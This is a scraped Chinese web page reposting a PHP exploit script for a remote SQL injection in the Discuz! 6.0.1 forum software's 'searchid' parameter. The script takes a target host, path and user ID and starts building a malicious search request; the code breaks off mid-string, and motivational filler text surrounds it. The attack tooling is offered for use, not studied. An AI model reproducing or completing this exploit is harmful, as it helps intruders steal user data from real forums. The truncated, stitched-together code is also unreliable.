Discuz! 6.0.1 (searchid) Remote SQL Injection Exploit

当你感觉整个世界似乎都在和你作对的时候,要记得飞机也是逆风起飞,而不是顺风飞起。
<?php
error_reporting(E_ALL&E_NOTICE);
print_r("
------------------------------------------------------------------
Exploit discuz6.0.1
Just work as php>=5 & mysql>=4.1
BY james
------------------------------------------------------------------
");

if($argc>4)
{
$host=$argv[1];
$port=$argv[2];
$path=$argv[3];
$uid=$argv[4];
}else{
echo "Usage: php ".$argv[0]." host port path uid\n";
echo "host: target server \n";
echo "port: the web port, usually 80\n";
echo "path: path to discuz\n";
echo "uid : user ID you wanna get\n";
echo "Example:\r\n";
echo "php ".$argv[0]." localhost 80 1\n";
exit;
}

$content ="action=search&searchid=22

本文Discuz! 6.0.1 (searchid) Remote SQL Injection Exploit 到此结束。太较真的人,常被感情所伤;太善良的人,常被他人所骗;太执着的人,常被现实所惑……于是,我们时常感觉疲惫,这不是身体的劳累,而是在精神的裂缝中迷漫的心灵苍老,让我们情无寄所,心无归依。世界就是这个样子,我们无须螳臂挡车,看开些,看淡些,情在心中,心在世外,一切就会简单得多。小编再次感谢大家对我们的支持!

标签: